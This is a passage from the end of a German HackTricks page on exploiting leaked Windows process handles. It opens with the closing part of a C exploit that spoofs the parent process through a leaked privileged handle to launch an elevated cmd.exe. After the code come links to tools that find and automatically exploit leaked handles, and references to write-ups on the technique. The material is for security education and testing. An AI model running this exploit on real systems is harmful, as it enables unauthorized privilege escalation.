InitializeProcThreadAttributeList(NULL, 1, 0, &size);
|
|
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST) HeapAlloc( GetProcessHeap(), 0, size );
|
|
|
|
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
|
|
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hProc, sizeof(HANDLE), NULL, NULL);
|
|
|
|
si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
|
|
|
|
// Spawn elevated cmd process
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|
ret = CreateProcessA( "C:\\Windows\\system32\\cmd.exe", NULL, NULL, NULL, TRUE,
|
|
EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOA)(&si), &pi );
|
|
|
|
if (ret == FALSE) {
|
|
printf("[!] Error spawning new process: [%d]\n", GetLastError());
|
|
return -1;
|
|
}
|
|
}
|
|
|
|
Sleep(20000);
|
|
return 0;
|
|
}
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|
```
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## Weitere Tools und Beispiele
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* [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder)
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Dieses Tool ermöglicht es Ihnen, ausgelaufene Handles zu überwachen, um verwundbare zu finden und sie sogar automatisch auszunutzen. Es enthält auch ein Tool zum Auslaufen eines Handles.
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* [**https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles**](https://github.com/abankalarm/ReHacks/tree/main/Leaky%20Handles)
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Ein weiteres Tool zum Auslaufen eines Handles und dessen Ausnutzung.
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## Referenzen
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* [http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)
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* [https://github.com/lab52io/LeakedHandlesFinder](https://github.com/lab52io/LeakedHandlesFinder)
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|
* [https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html](https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html)
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<details>
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|
<summary><strong>Lernen Sie AWS-Hacking von Grund auf mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
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Andere Möglichkeiten, HackTricks zu unterstützen:
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* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
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* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
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* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
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* **Teilen Sie Ihre Hacking-Tricks, indem Sie Pull Requests an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
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</details>
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